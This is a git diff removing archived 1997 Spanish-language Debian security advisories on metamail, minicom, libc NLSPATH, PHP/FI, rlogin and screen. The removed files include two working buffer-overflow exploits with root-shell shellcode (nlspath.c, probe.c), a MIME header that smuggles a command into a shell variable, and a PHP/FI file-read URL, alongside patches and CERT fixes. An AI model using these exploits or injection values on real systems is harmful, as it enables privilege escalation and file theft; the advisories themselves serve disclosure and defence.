HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Información sobre Seguridad</H1> -<HR> -Debian se toma la seguridad muy en serio. La mayoría de los <a href="../index.html">problemas sobre seguridad</a> llegados a nuestra atención son corregidos en 48 horas. - -<P> Por favor, envie las noticias de fallos relacionados con la seguridad a <a href="mailto:security@debian.org">security@debian.org</a><P> - -<blockquote> -<b>De: Alan Cox <alan@cymru.net></b> <br> -<b>Fecha: Mie, 9 Abr 1997 10:58:48 +0100 (BST)</b> <p> - -Este parece ser un fallo de tcsh, pero aparece con metamail y puede ser abusado. El mensaje de Olaf se muestra abajo. Lo he pasado también al CERT <p> - -Alan Cox <p> - -<hr> - -Hola Alan, <p> - -Aquí tienes la info de metamail que prometí enviarte. El agujero puede ser explotable si -dejas que metamail ejecute showext para los mensajes del tipo message/external-body. Al menos tcsh, y posiblemente algunos otros csh, -parece que hacen cosas misteriosas al expandir los argumentos de la linea de comandos. -Si se le pasa a un script un argumento de "foo FTP=/tmp/evilcmd", y hace <p> - -<pre> - set var=$1 -</pre> - -esto puede asignar foo a $var, y /tmp/evilcmd a $FTP. Desgraciadamente, -metamail invoca a showext con los atributos mime en la línea de comandos, -así que básicamente le evia una cabecera como ésta <p> - -<pre> - Content-type: message/external-body; - access-type="anon-ftp"; - name="passwd"; - site="monad.swb.de"; - directory="/etc"; - mode="image FTP=/tmp/evilcmd" -</pre> - -Además, más abajo, el script ejecutará $FTP para iniciar la conexión de ftp. -Hasta ahora, no he sido capaz de pasarle argumentos al comando, pero eso -no signifaica que tú no puedas hacer cosas interesantes con lo anterior. <p> - -El parche se incluye <a href="metamail.patch">aquí</a>. <p> - -Saludos -Olaf <p> -<hr> -<pre> -Olaf Kirch | --- o --- Nous sommes du soleil we love when we play -okir@monad.swb.de | / | \ sol.dhoop.naytheet.ah kin.ir.samse.qurax -okir@lst.de +-------------------- Why Not?! ----------------------- -</pre> -<hr> - -</blockquote> - -<P><SMALL>Última modificación: 10 Enero 1998. -Copyright ©1997 SPI; Ver -<A HREF="../../license.html">condiciones de licencia.</A></SMALL> -<HR> -</BODY> -</HTML> - - diff --git a/spanish/security/info/metamail.patch b/spanish/security/info/metamail.patch deleted file mode 100644 index e58eeaa67fe..00000000000 --- a/spanish/security/info/metamail.patch +++ /dev/null @@ -1,66 +0,0 @@ -diff -ur zap/mm2.7/src/bin/showexternal mm2.7/src/bin/showexternal ---- zap/mm2.7/src/bin/showexternal Tue Feb 8 17:39:05 1994 -+++ mm2.7/src/bin/showexternal Thu Jan 16 12:00:25 1997 -@@ -27,26 +27,34 @@ - echo "Usage: showexternal body-file access-type name [site [directory [mode [server]]]]" - exit -1 - endif --set bodyfile=$1 -+# Check argument integrity. Don't trust mail headers -+switch ("$1$2$3$4$5$6$7") -+case "*[ ]*": -+ echo "Illegal white space in arguments -- possibly a mail bomb?!" -+ echo "Command was:" -+ echo \'$0\' \'$1\' \'$2\' \'$3\' \'$4\' \'$5\' \'$6\' \'$7\' -+ exit 2 -+endsw -+set bodyfile="$1" - set atype=`echo $2 | tr ABCDEFGHIJKLMNOPQRSTUVWXYZ abcdefghijklmnopqrstuvwxyz` --set name=$3 -+set name="$3" - if ($#argv > 3) then -- set site=$4 -+ set site="$4" - else - set site="" - endif - if ($#argv > 4) then -- set dir=$5 -+ set dir="$5" - else - set dir="" - endif - if ($#argv > 5) then -- set mode=$6 -+ set mode="$6" - else - set mode="" - endif - if ($#argv > 6) then -- set server=$7 -+ set server="$7" - else - set server="" - endif -diff -ur zap/mm2.7/src/bin/showpartial mm2.7/src/bin/showpartial ---- zap/mm2.7/src/bin/showpartial Thu Feb 3 00:21:29 1994 -+++ mm2.7/src/bin/showpartial Thu Jan 16 11:48:59 1997 -@@ -11,14 +11,14 @@ - echo "Usage: showpartial file id partnum totalnum" - exit -1 - endif --set file=$1 -+set file="$1" - # This next line is because message-id can contain weird chars --set id=`echo $2 | tr -d \!\$\&\*\(\)\|\'\"\;\/\<\>\\` --@ partnum = $3 -+set id=`echo "$2" | tr -d \!\$\&\*\(\)\|\'\"\;\/\<\>\\` -+@ partnum = "$3" - if ($#argv == 3 || $4 == "") then - set totalnum=-1 - else -- @ totalnum = $4 -+ @ totalnum = "$4" - endif - - if (! -d $TREEROOT) then diff --git a/spanish/security/info/minicom.html b/spanish/security/info/minicom.html deleted file mode 100644 index b4426c0e994..00000000000 --- a/spanish/security/info/minicom.html +++ /dev/null @@ -1,75 +0,0 @@ -<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> -<!--translation 1.1.1.1--> -<HTML> -<HEAD> -<TITLE>Debian GNU/Linux - Información sobre Seguridad</TITLE> -<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1"> -<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> -</HEAD> - -<BODY BGCOLOR="#FFFFFF"> -<H1><IMG SRC="../../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Información sobre Seguridad</H1> -<HR> -Debian se toma la seguridad muy en serio. Las mayoría de los <a href="../index.html">problemas sobre seguridad</a> llegados -ha nuestra atención son corregidos en 48 horas. - -<P> Por favor, envie las noticias de fallos relacionados con la seguridad a <a href="mailto:security@debian.org">security@debian.org</a><P> - -<blockquote> -<b>Fecha: Lun, 10 Feb 1997 05:44:53 +0400</b> <br> -<b>De: "Dmitry E. Kim" <jason@redline.ru></b> <p> - - hola ppl, <p> - - bueno, aquí va otra vulnerabilidad del desbordamiento de buffer estandar, que veces puede llevar al root en un compromiso (no siempre. no en las nuevas distribuciones, -afortunadamente). El Slackware y Red Hat actuales no instalan minicom como -suid root, sólo sgid/uucp, que no es *tan* peligroso. Pero cuando se construye minicom desde el fuente, te pide que le hagas un "chmod +s". <p> - -<dl> -<dt><b>Resumen:</b> -<dd> La vulnerabilidad en minicom permite a (ciertos) usuarios locales obtener privilegios de grupo "uucp" y, en ciertos casos, privilegios de root. - -<dt><b>Plataformas:</b> -<dd> Supuestamente todas las plataformas donde minicom se instala como suid y/o sgid. - Solo lo he probado en algunas boxes de Linux (reciente Slackware 3.1 y - reciente Red Hat 4.1), y a mi me funcionaba. - -<dt><b>Descripción:</b> -<dd> De acuerdo con las páginas man, "minicom es un programa de comunicaciones que se - parece algo al programa shareware TELIX pero es libre con el código fuente y corre - bajo la mayoría de los unices". - El binario de Minicom normalmente pertenece a usuario "root" y al grupo "uucp", y es - "-rwxr-sr-x" o, en algunas distribuciones viejas, "-rwsr-sr-x". En realidad, - minicom tiene *muchos* buffers de distintos tamaños y es realmente sencillo - desbordar alguno de ellos. Al menos uno de esos buffers desbordables es - automático -- un argumento en la opción "-d" de minicom se copia en - un array automático de 128 bytes. De este modo, es posible sobreescribir la dirección de retorno de la función y ejecutar cualquier código (como suele ser). - -<dt><b>Impacto:</b> -<dd> Si minicom se instala como suid root, cualquier usuario que tenga permitido usar - minicom puede obtener un shell de root. Si minicom se instala como sgid uucp, cualquier - usuario de minicom puede obtener privilegios del grupo uucp (por favor no crea que no es - nada -- al menos en máquinas Slackware /usr/lib/uucp puede ser escrito por el grupo. - Esto significa que puede sustituir facilmente uucico/uuxqt/etc con sus scripts). - -<dt><b>Solución:</b> -<dd> Rápido arreglo, como normalmentec -- chmod 755 `which minicom`. - -<dt><b>"Exploit":</b> -<dd> Abajo va el "exploit" para Linux. Después de ejecutarlo, tienes el shell con - uid=0 y euid=your_usual_uid (si minicom es suid root) y gid=uucp - egid=su_gid_usual. Conseguir los permisos reales de root y del grupo uucp desde ahí - es demasiado trivial para describirlo aquí&;. - -Fichero de quoting "<a href="stack.c">stack.c</a>" - -</blockquote> - -<P><SMALL>Última modificación: 10 Enero 1998. -Copyright ©1997 SPI; Ver -<A HREF="../../license.html">condiciones de licencia.</A></SMALL> -<HR> -</BODY> -</HTML> - - diff --git a/spanish/security/info/nlspath.c b/spanish/security/info/nlspath.c deleted file mode 100644 index 8b69b566221..00000000000 --- a/spanish/security/info/nlspath.c +++ /dev/null @@ -1,39 +0,0 @@ -/* - * NLSPATH buffer overflow exploit for Linux, tested on Slackware 3.1 - * Copyright (c) 1997 by Solar Designer - */ - -#include <stdio.h> -#include <stdlib.h> -#include <unistd.h> - -char *shellcode = - "\x31\xc0\xb0\x31\xcd\x80\x93\x31\xc0\xb0\x17\xcd\x80\x68\x59\x58\xff\xe1" - "\xff\xd4\x31\xc0\x99\x89\xcf\xb0\x2e\x40\xae\x75\xfd\x89\x39\x89\x51\x04" - "\x89\xfb\x40\xae\x75\xfd\x88\x57\xff\xb0\x0b\xcd\x80\x31\xc0\x40\x31\xdb" - "\xcd\x80/" - "/bin/sh" - "0"; - -char *get_sp() { - asm("movl %esp,%eax"); -} - -#define bufsize 2048 -char buffer[bufsize]; - -main() { - int i; - - for (i = 0; i < bufsize - 4; i += 4) - *(char **)&buffer[i] = get_sp() - 3072; - - memset(buffer, 0x90, 512); - memcpy(&buffer[512], shellcode, strlen(shellcode)); - - buffer[bufsize - 1] = 0; - - setenv("NLSPATH", buffer, 1); - - execl("/bin/su", "/bin/su", NULL); -} diff --git a/spanish/security/info/nlspath.html b/spanish/security/info/nlspath.html deleted file mode 100644 index fbaedef1da0..00000000000 --- a/spanish/security/info/nlspath.html +++ /dev/null @@ -1,67 +0,0 @@ -<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> -<!--translation 1.1.1.1--> -<HTML> -<HEAD> -<TITLE>Debian GNU/Linux - Security Information</TITLE> -<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1"> -<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> -</HEAD> - -<BODY BGCOLOR="#FFFFFF"> - -<H1><IMG SRC="../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Información sobre seguridad</H1> -<HR> - -Debian considera la seguridad como algo muy serio. La mayoría de los <a href="../index.html">problemas sobre seguridad</a> recibidos a nuestra atención son corregidos en 48 horas. - -<P> Por favor, mande noticias de fallos sobre seguridad a <a href="mailto:security@debian.org">security@debian.org</a><P> - -<blockquote> -<b>Fecha: Mar, 13 Feb 1997 23:08:13 -0500</b> <br> -<b>Desde: solar@IDEAL.RU</b> <p> - -Hola! <p> - -Disculpad si las informaciones que voy a exponer a continuación son ya -conocidas, pero espero que no lo sean ... <p> - -Acabo de encontrar una vulnerabilidad en la libc de Linux (En realidad, algunas -versiones parece que no son vulnerables; mi Slackware 3.1 si lo es). -Por desgracia, no tengo tiempo ahora para una investigación más profunda, -pero aquí está la vulneración . Tenga en cuenta que el código -shell es ligeramente diferente del habitual: <p> -<ul> -<li> Efectúa setuid(geteuid()) mediante él mismo; -<li> Es más fácil de modificar (no hay direcciones "a capón" en el -código, y el nombre del shell se puede cambiar también; la longitud no -es fija); -<li> El propio puntero a NULL se pasa en %edx a la llamada del sistema execve, -no la referencia a NULL (parece en error en el artículo de Aleph One); ésto no parece afectar a nada de cualquier manera. - -</ul> - -Es pobible vulnerar éste agujero de manera remota, mediante el uso de un -telnet parcheado que permitiese exportar un entorno de variables suficientemente -grande. El desbordamiento ocurriría en el arranque de /bin/login (algo similar -al famoso exploit LD_PRELOAD, pero como desbordamiento). No obstante,no estoy -seguro de ello puesto que puede haber algunas restricciones en la variables de -entorno de telnetd. <p> - -En relación con el arreglo, bueno, es duro -- pudiera ser necesario -recompilar libc y librerías lincadas estáticamente. Para protegerse Vd. -mismo contra ataques remotos, puede por ejemplo cambiar el nombre de la -variable a álgo distinto, con un editor hexadecimal (como /usr/bin/bpe), -en /lib/libc.so.5, y asegurarse de que la vulneración ha dejado de -funcionar. Por supuesto, ésto es sólo un arreglo temporal. <p> - -<a href="nlspath.c">nlspath.c</a> y <a href="shellcode.s">shellcode.s</a> -</blockquote> - -<P><SMALL>Ultima modificación: 10 de Enero de 1.998. -Copyright ©1997, 1998 SPI; Vea -<A HREF="../../license.html">condiciones de la licencia.</A></SMALL> -<HR> -</BODY> -</HTML> - - diff --git a/spanish/security/info/nslpath.html b/spanish/security/info/nslpath.html deleted file mode 100644 index fa291e0f5e3..00000000000 --- a/spanish/security/info/nslpath.html +++ /dev/null @@ -1,51 +0,0 @@ - -<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> -<HTML> -<HEAD> -<TITLE>Debian GNU/Linux - Información sobre Seguridad</TITLE> -<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1"> -<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> -</HEAD> - -<BODY BGCOLOR="#FFFFFF"> -<H1><IMG SRC="../../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Información sobre Seguridad</H1> -<HR> -Debian se toma la seguridad muy en serio. La mayoría de los <a href="../index.html">problemas de seguridad</a> que no llegas son corregidos en 48 horas. - -<P> Por favor, envie las noticias de fallos relacionados con la seguridad a <a href="mailto:security@debian.org">security@debian.org</a><P> - -<blockquote> -<b>Fecha: Thu, 13 Feb 1997 23:08:13 -0500</b> <br> -<b>De: solar@IDEAL.RU</b> <p> - -Hola! <p> - -Lo siento si la información que voy a dar ya se conoce, pero -espero que no sea así... <p> - -Solo raramente he encontrado una vulnerabilidad en el libc de Linux (en realidad, algunas de las versiones no parecen ser vulnerables; mi box de Slackware 3.1 se suponía). -Desafortunadamente, no tengo tiempo para una buena investigación ahora mismo, pero aquí va el exploit de todos modos. Notese que el código de shell es algo diferente del habitual: <p> -<ul> -<li> realiza setuid(geteuid()) por sí mismo; -<li> más fácil de modificar (no más offsets fijos en el código de shell, y también se puede cambiar el nombre del shell -- la longitud no es fija); -<li> el mismo puntero NULL se pasa en el %edx a la llamada del sistema execve, no el -puntero al NULL (parece un error del artículo de Aleph One); esto -no parece afectar en nada. -</ul> - -Puede explotarse este agujero remotamente, si se usa un cliente de telnet parcheado que permita exportar largos valores de variables de entorno. El -desbordamiento ocurrirá al inicio del /bin/login luego (algo parecido al famoso 'exploit' LD_PRELOAD, pero un desbordamiento). No estoy seguro de ello, puede haber algunas restricciones sobre las variables de entorno en telnetd. <p> - -Como solución, esta es una complicada -- requeriría la recompilación de libc, y de los binarios enlazados estáticamente. Para protegerse contra los ataques remotos, puede por ejemplo cambiar el nombre de la variable name a otro distinto, con el editor hex (como /usr/bin/bpe), en /lib/libc.so.5, y asegurarse de que el exploit deja de funcionar. Por supuesto, esta es solo un solución temporal. <p> - -<a href="nlspath.c">nlspath.c</a> y <a href="shellcode.s">shellcode.s</a> -</blockquote> - -<P><SMALL>Última modificación: 10 Enero 1998. -Copyright ©1997 SPI; Ver -<A HREF="../../license.html">condiciones de licencia.</A></SMALL> -<HR> -</BODY> -</HTML> - - diff --git a/spanish/security/info/php.html b/spanish/security/info/php.html deleted file mode 100644 index d9f8ab41814..00000000000 --- a/spanish/security/info/php.html +++ /dev/null @@ -1,81 +0,0 @@ -<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> -<!--translation 1.1.1.1--> -<HTML> -<HEAD> -<TITLE>Debian GNU/Linux - Información sobre Seguridad</TITLE> -<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1"> -<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> -</HEAD> - -<BODY BGCOLOR="#FFFFFF"> -<H1><IMG SRC="../../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Información sobre Seguridad</H1> -<HR> -Debian se toma la seguridad muy en serio. La mayoría de los <a href="../index.html">problemas sobre seguridad</a> llegados -a nuestra atención son corregidos en 48 horas. - -<P> Por favor, envie las noticias de fallos relacionados con la seguridad a <a href="mailto:security@debian.org">security@debian.org</a><P> - -<blockquote> -<b>Fecha: Mie, 16 Apr 1997 21:01:12 -0400</b><br> -<b>De: Shamanski <jshaman@m-net.arbornet.org></b><p> - -<hr> -[DiS] Advisory 97-347.1<br> -Fecha Edición: 16 de Abril de 1997<br> -Tema: Vulnerabilidad REMOTA en PHP/FI<br> -<hr> - -DIS ha encontrado una vulnerabilidad en PHP/FI, a cgi mejorado de NCSA httpd. -Esta vulnerabilidad permito a usuarios no autorizados ver el contenido de cualquier fichero en la máquina donde corra httpd enviando el nombre del fichero que desea ver como QUERY_STRING. <p> - -<ol> -<li> "Exploit" - - simplemente utilice cualquier nevegador de web para enviar lo siguiente URL: - - http://boogered.system.com/cgi-bin/php.cgi?/file/to/view - - Nota: este "exploit" no ha sido probado en un sistema que haya compilado PHP/FI como un módulo de apache. Esta información puede ser o no ser aplicable en dicho sistema. - -<li> Impacto - - Usuarios remotos no autorizados pueden ver el contenido de cualquier fichero en el sistema - con los mismos privilegios que los procesos hijos de httpd (demonio de HTTP). - - -<li> Solución - - El autor ha propuesto la siguiente solución: - - <em> - ...Consiste en establecer lo siguiente en php.h<p> - - #define PATTERN_RESTRICT ".*\\.phtml$"<p> - - Esto limitará al parser php.cgi a presentar solo los ficheros terminados en .phtml <p> - - El mismo aviso se aplica a cualquier otro parser que alguien pueda decidir instalar en su directorio cgi-bin directory. Esto no es de ningún modo específico de PHP/FI. <p> - - Puede también evitar el problema usando la redirección CGI o la versión del módulo de Apache. <p> - - -Rasmus - </em> -</ol> - -La distribución actual de PHP/FI puede obtener en <a href="http://www.vex.net/php/">http://www.vex.net/php/</a> <p> - -<hr> -J-Man Th' Shaman [DiGiTAL iNFORMATiON SOCiETY]<br> -<a href="mailto:jshaman@m-net.arbornet.org">jshaman@m-net.arbornet.org</a><br> -<a href="mailto:jamin@avatar.ml.org">jamin@avatar.ml.org</a><p> -<hr> -</blockquote> - -<P><SMALL>Última modificació: 10 Jan 1998. -Copyright ©1997 SPI; Vea -<A HREF="../../license.html">condiciones de licencia.</A></SMALL> -<HR> -</BODY> -</HTML> - - diff --git a/spanish/security/info/probe.c b/spanish/security/info/probe.c deleted file mode 100644 index 05b04f7b9d6..00000000000 --- a/spanish/security/info/probe.c +++ /dev/null @@ -1,39 +0,0 @@ -/* - * SuperProbe buffer overflow exploit for Linux, tested on Slackware 3.1 - * Copyright (c) 1997 by Solar Designer - */ -#include <stdio.h> -#include <stdlib.h> -#include <unistd.h> - -char *shellcode = - "\x31\xc0\xb0\x31\xcd\x80\x93\x31\xc0\xb0\x17\xcd\x80\x68\x59\x58\xff\xe1" - "\xff\xd4\x31\xc0\x8d\x51\x04\x89\xcf\x89\x02\xb0\x2e\x40\xfc\xae\x75\xfd" - "\x89\x39\x89\xfb\x40\xae\x75\xfd\x88\x67\xff\xb0\x0b\xcd\x80\x31\xc0\x40" - "\x31\xdb\xcd\x80/" - "/bin/sh" - "0"; - -char *get_sp() { - asm("movl %esp,%eax"); -} - -#define bufsize 8192 -#define alignment 0 -char buffer[bufsize]; - -main() { - int i; - - for (i = 0; i < bufsize / 2; i += 4) - *(char **)&buffer[i] = get_sp() - 2048; - memset(&buffer[bufsize / 2], 0x90, bufsize / 2); - strcpy(&buffer[bufsize - 256], shellcode); - setenv("SHELLCODE", buffer, 1); - - memset(buffer, 'x', 72); - *(char **)&buffer[72] = get_sp() - 6144 - alignment; - buffer[76] = 0; - - execl("/usr/X11/bin/SuperProbe", "SuperProbe", "-nopr", buffer, NULL); -} diff --git a/spanish/security/info/rlogin.html b/spanish/security/info/rlogin.html deleted file mode 100644 index 0e403e1099f..00000000000 --- a/spanish/security/info/rlogin.html +++ /dev/null @@ -1,208 +0,0 @@ -<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> -<!--translation 1.1.1.1--> -<HTML> -<HEAD> - -<TITLE>Debian GNU/Linux - Información sobre Seguridad</TITLE> -<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1"> -<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> -</HEAD> - -<BODY BGCOLOR="#FFFFFF"> - -<H1><IMG SRC="../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Información sobre seguridad</H1> -<HR> - -Debian considera la seguridad como algo muy serio. La mayoría de los <a href="../index.html">problemas sobre seguridad</a> recibidos a nuestra atención son corregidos en 48 horas. - - -<P> Por favor, mande noticias de fallos sobre seguridad a <a href="mailto:security@debian.org">security@debian.org</a><P> -<blockquote> -<a href="ftp://info.cert.org/pub/cert_advisories/CA-97.06.rlogin-term">Notificación-CERT</a> <p> - -El Centro de Coordinación del CERT ha recibido noticias sobre vulnerabilidades -en varias implementaciones del programa rlogin, incluyendo eklogin y klogin. -Aprovechado ésta vulnerabilidad, usuarios con acceso a una cuenta del sistema -pueden causar desbordamiento de memoria ("buffer overflow") y ejecutar programas -como root. - -El equipo de CERT/CC recomienda instalar un parche del proveedor para éste -problema (Sec. III.A). Hasta que pueda hacerlo, le recomendamos encarecídamente -que deshabilite rlogin ó lo sustituya por un programa "envoltorio" (wrapper). -(Ver Sec. III.B.2). <p> - -Actualizaremos ésta notificación tan pronto como recibamos información adicional. -Por favor, compruebe regularmente éstos ficheros de notificación para actualizaciones relativas a su instalación. <p> - -<hr> - -<ol> -<li><b> Descripción</b> <p> - - El programa rlogin, suministrado en muchos sistemas UNIX y no-UNIX, se describe en la RFC 1282. - A continuación se muestra una parte de ésa RFC, la cual describe su funcionalidad básica: <p> - - - <em> - "La facilidad rlogin ofrece un terminal virtual con control de flujo - local y un vaciado adecuado de la salida. Es usado extensamente entre - equipos Unix ya que provee el intercambio de un mayor número de - controles de pantalla que el protocolo Telnet, y además dado que - se puede configurar para que entre conexiones entre servidores - autentificados no sea requerida palabra de paso." - - </em> <p> - - La clave de ésta descripción es que el programa rlogin traspasa la - descripción del terminal desde el equipo local al remoto. - Esta funcionalidad permite que programas que precisan terminal, tales - como editores de texto a pantalla completa, puedan trabajar adecuadamente - entre una conexion ordenador-a-ordenador creada con rlogin. <p> - - Para llevar ésto a cabo, el programa rlogin utiliza la definición actual - del terminal identificada por la variable de entorno TERM. El protocolo, - descrito en la RFC 1282, explica cómo ésta información se transfiere - desde el equipo local, donde se ejecuta el cliente rlogin, al equipo - remoto donde se ejecuta el servicio. <p> - To do this, the rlogin program uses the current terminal definition as - identified by the TERM environment variable. The protocol described in - RFC 1282 explains how this terminal information is transferred from the - local machine where the rlogin client program is running to the remote - machine where service is sought. <p> - - Por desgracia, muchas implementaciones del programa rlogin adolecen de - un defecto debido a que el valor de la variable de entorno TERM se copia - a un búfer interno sin las debidas precauciones. El búfer que contiene - el valor de TERM puede ser desbordado. En algunas implementaciones el - búfer es una variable local, con lo que la pila de llamadas a subrutinas - puede ser reescrita y por tanto puede ser ejecutado código cualquiera. - Éste código se hallaría bajo en control del usuario que corra el programa - rlogin. <p> - - Encima, el programa rlogin es suid root. Rlogin precisa de éstos - privilegios para poder inicializar un puerto en el rango preciso, como - se describe en el man de in.rlogind (ó rlogind): <p> - - <em> - "El servidor comprueba el puerto origen del cliente. Si el puerto - no se halla en el rango de 0 a 1023, el servidor aborta la conexion". - </em> <p> - - En resumen, rlogin es un programa con suid root, que en muchas - implementaciones contiene un defecto de programación mediante el - cual un búfer interno puede ser desbordado y por tanto es posible - ejecutar cualquier código con privilegios de root. - -<li><b> Impacto</b> <p> - - Los usuarios pueden convertirse en root si tienen acceso a una cuenta - en el sistema. - -<li> <b>Solución</b> <p> - - Instalar un parche del proveedor, si existe (Sección A). Hasta que - le sea posible ejercer ésta acción, le recomendamos que aplique la - descrita en la Sección B. - - <ol> - <li> Conseguir y aplicar un parche para solventar éste problema <p> - - A continuación se describe una lista de aquellos proveedores que han - suministrado información sobre rlogin. Los detalles se encuentran en - el Apéndice A de ésta notificación; iremos actualizando el apéndice - a medida que vayamos recibiendo información. Si el nombre de su - proveedor no figura en ésta lista, en el CERT/CC no saben nada de él. - Por favor, contacte con el proveedor directamente. <p> - - Berkeley Software Design, Inc. (BSDI) <br> - Cray Research - A Silicon Graphics Company <br> - Cygnus Solutions (formerly Cygnus Support) <br> - Data General Corporation <br> - Digital Equipment Corporation <br> - FreeBSD, Inc. <br> - Hewlett-Packard Corporation <br> - IBM Corporation <br> - Linux Systems <br> - NEC Corporation <br> - NetBSD <br> - NeXT Software, Inc. <br> - The Open Group <br> - The Santa Cruz Operation (SCO) <br> - Sun Microsystems, Inc. <p> - - <li> Hasta el momento en el cual le sea posible aplicar el parche, - le recomendamos una de las siguientes alternativas: <p> - - <ol> - <li>Deshabilite rlogin. <p> - Si sus usuarios no usan rlogin, quítelo. Para ello, haga lo - siguiente (como root) : <p> - - % chmod 0 /usr/bin/rlogin <p> - - Puede que el programa rlogin se encuentre en otros directorios de - su sistema, tales como /bin, /usr/bin, /usr/ucb. <p> - - Nota: En algunos sistemas, rlogin se presenta de distintas maneras - al efecto de ejecutar más cosas. Ejemplos son eklogin - (autentificación Kerberos además de cifrado del flujo de datos) - y klogin (sólamente autentificación Kerberos). Es necesario quitar - ambos también. <p> - - <li> Sustituya rlogin por un programa "envoltorio". <p> - Hemos escrito un prototipo de ésto y se halla disponible en: - - URL <a href="ftp://info.cert.org/pub/tools/rlogin_wrapper/rlogin_wrapper.c">ftp://info.cert.org/pub/tools/rlogin_wrapper/rlogin_wrapper.c</a> <p> - - The PGP signature for this file is available at - URL <a href="ftp://info.cert.org/pub/tools/rlogin_wrapper/rlogin_wrapper.c.asc">ftp://info.cert.org/pub/tools/rlogin_wrapper/rlogin_wrapper.c.asc</a> <p> - - Para verificar que el fichero es el correcto, tráigase los dos - ficheros rlogin_wrapper.c y rlogin_wrapper.c.asc y compruebe la - firma con pgp tal que: <p> - - % pgp rlogin_wrapper.c.asc rlogin_wrapper.c <p> - - <b>Notes:</b> - <ul> - <li> Puede ser necesario tocar el programa para que compile - correctamente en su sistema. - - <li> Si, como se menciona en la sección anterior, tiene más - programas del tipo rlogin, debe reemplazarlas por el - envoltorio. - </ul> - </ol> -</ol> -<hr> - -<h3>Apéndice A - Información del proveedor</h3> - - -A continuación se detalla una lista de aquellos proveedores que han suministrado - información para ésta notificación; iremos actualizando éste apéndice a medida -que vayamos recibiendo información adicional. Si Vd. no ve aquí el nombre de su -proveedor, el CERT/CC no ha recibido noticias suyas. Por favor, contacte con el -proceedor directamente. - -Sistemas Linux<p> - - Sólamente son vulnerables los sistemas Linux muy desactualizados. <p> - - Linux Netkit 0.08 lleva el rlogin corregido. Todos los sistemas Linux - que utilicen NetKits más antigüos deben actualizarse a NetKit 0.09. - Algunos proveedores han incluído parches en versiones NetKit-0.08. - Confírmelo con su proveedor. <p> - - NetKit 0.09 se halla disponible en: <a href="ftp://ftp.uk.linux.org/pub/linux/Networking/base/NetKit-0.09.tar.gz">ftp://ftp.uk.linux.org/pub/linux/Networking/base/NetKit-0.09.tar.gz</a> <p> - -</blockquote> - -<P><SMALL>Ultima modificación: 10 Ene 1998. -Copyright ©1997 SPI; Vea -<A HREF="../license.html">condiciones de la licencia.</A></SMALL> -<HR> -</BODY> -</HTML> - - diff --git a/spanish/security/info/screen.html b/spanish/security/info/screen.html deleted file mode 100644 index d923bc1e135..00000000000 --- a/spanish/security/info/screen.html +++ /dev/null @@ -1,68 +0,0 @@ -<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> -<!--translation 1.1.1.1--> -<HTML> -<HEAD> - -<TITLE>Debian GNU/Linux - Información sobre Seguridad</TITLE> -<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1"> -<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> -</HEAD> - -<BODY BGCOLOR="#FFFFFF"> - -<H1><IMG SRC="../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Información sobre seguridad</H1> -<HR> - -Debian considera la seguridad como algo muy serio. La mayoría de los <a href="../index.html">problemas sobre seguridad</a> recibidos a nuestra atención son corregidos en 48 horas. - -<P> Por favor, mande noticias de fallos sobre seguridad a <a href="mailto:security@debian.org">security@debian.org</a><P> - -<blockquote> -<b>Fecha: Jue, 20 Feb 1997 21:23:31 -0500</b> <br> -<b>Desde: Khelbin <khelbin@connix.com></b> <p> - - -Screen 3.07.02, cuando de halla con setuid root (como sucede habitualmente), -permite desbordar memoria (buffer overflow) al menos sobre determinadas plataformas. -No he leído la totalidad del código pero en un vistazo rápido me percaté que -attacher.c hace lo siguiente: <p> - -<pre> - struct passwd ppp; - char fullname[100]; - - strcpy(fullname, ppp->pw_gecos); -</pre> - - -Pude trabajarme una vulneración rápida pero no funcionó en BSDI 1.1 ya que -chpass/chfn no aceptan determinados caracteres. Por ello, leyendo en shellcode -el campo de "Full Name" produjo un mensaje de error de "Carácter ilegal en el campo Nombre Completo (Full Name), re-editar [s]?" o also parecido. <p> - -Cualquier S.O. ó versión de chfn/chpass que no compruebe la existencia de 'caracteres ilegales', ó la longitud de la información introducida en el campo -(BSDI 1.1 no chequea la longitud, sólamente caracteres ilegales) puede -ser vulnerable (No he comprobado si da privilegios de sui root aún, lo iba -a hacer desbordándolo con la cadena de mi shellcode) .<p> - -Si alguien puede comprobarlo en plataformas distintas y mandarmelo, estaría -interesado. Lo que yo hacía era poner mi cadena shellcode en una variable de -entorno (con los NOPs y la dirección de retorno hacia los NOPs) y haciendo -echo de dicha variable a un fichero. Entonces sólamente falta leer en ése -fichero la información de chpass/chfn como el nuevo gecos. <p> - -En realidad no me llevó mucho tiempo mirar entre el código y encontrar -un problema, así que estoy seguro de que hay más. -Screen es realmente un programa demasiado grande para ser suid root y -la vieja advertencia de no ejecutar programas que no se necesitan, -especialmente si son suid root, suele ser siempre cierta. <p> - -</blockquote> - -<P><SMALL>Ultima modificación: 10 de 